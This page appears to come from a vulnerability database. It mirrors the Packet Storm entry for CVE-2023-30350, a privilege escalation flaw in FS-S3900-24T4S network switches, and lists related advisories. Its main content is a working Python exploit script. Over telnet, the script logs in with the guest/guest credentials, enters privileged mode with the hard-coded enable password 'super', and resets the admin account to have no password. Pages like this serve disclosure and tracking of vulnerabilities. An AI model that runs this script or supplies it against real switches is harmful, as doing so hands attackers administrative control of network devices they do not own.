Lucene search
+L

FS-S3900-24T4S Privilege Escalation

🗓️ 03 May 2023 00:00:00Reported by Daniele Linguaglossa, Alberto BruscinoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 255 Views

FS-S3900-24T4S Privilege Escalation Exploit allowing unauthorized privilege escalation on FS-S3900-24T4S switches.

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
FS-S3900-24T4S - Privilege Escalation Exploit
2 May 202300:00
zdt
attackerkb
ATTACKERKB
CVE-2023-30350
29 May 202300:15
attackerkb
bdu_fstec
BDU FSTEC
The vulnerability of the microprogramming software for FS S3900-24T4S devices, due to deficiencies in access control, allows attackers to escalate their privileges and bypass the administrator password.
31 May 202300:00
bdu_fstec
circl
Circl
CVE-2023-30350
4 May 202313:29
circl
cnnvd
CNNVD
FS-S3900-24T4S 安全漏洞
2 May 202300:00
cnnvd
cve
CVE
CVE-2023-30350
28 May 202300:00
cve
cvelist
Cvelist
CVE-2023-30350
28 May 202300:00
cvelist
exploitdb
Exploit DB
FS-S3900-24T4S - Privilege Escalation
2 May 202300:00
exploitdb
euvd
EUVD
EUVD-2023-34771
3 Oct 202520:07
euvd
nvd
NVD
CVE-2023-30350
29 May 202300:15
nvd
Rows per page
`# Exploit Title: FS-S3900-24T4S Privilege Escalation  
# Date: 29/04/2023  
# Exploit Author: Daniele Linguaglossa & Alberto Bruscino  
# Vendor Homepage: https://www.fs.com/  
# Software Link: not available  
# Version: latest  
# Tested on: latest  
# CVE : CVE-2023-30350  
  
import sys  
import telnetlib  
  
  
def exploit(args):  
print(args)  
if len(args) != 1:  
print(f"Usage: {sys.argv[0]} <ip>")  
sys.exit(1)  
else:  
ip = args[0]  
try:  
with telnetlib.Telnet(ip, 23) as tn:  
try:  
tn.read_until(b"Username: ")  
tn.write(b"guest\r\n")  
tn.read_until(b"Password: ")  
tn.write(b"guest\r\n")  
tn.read_until(b">")  
tn.write(b"enable\r\n")  
tn.read_until(b"Password: ")  
tn.write(b"super\r\n")  
tn.read_until(b"#")  
tn.write(b"configure terminal\r\n")  
tn.read_until(b"(config)#")  
tn.write(b"username admin nopassword\r\n")  
tn.read_until(b"(config)#")  
print(  
"Exploit success, you can now login with username: admin and password: <empty>")  
tn.close()  
except KeyboardInterrupt:  
print("Exploit failed")  
tn.close()  
except ConnectionRefusedError:  
print("Connection refused")  
  
  
if __name__ == "__main__":  
exploit(sys.argv[1:])  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 May 2023 00:00Current
6.9Medium risk
Vulners AI Score6.9
EPSS0.05343
255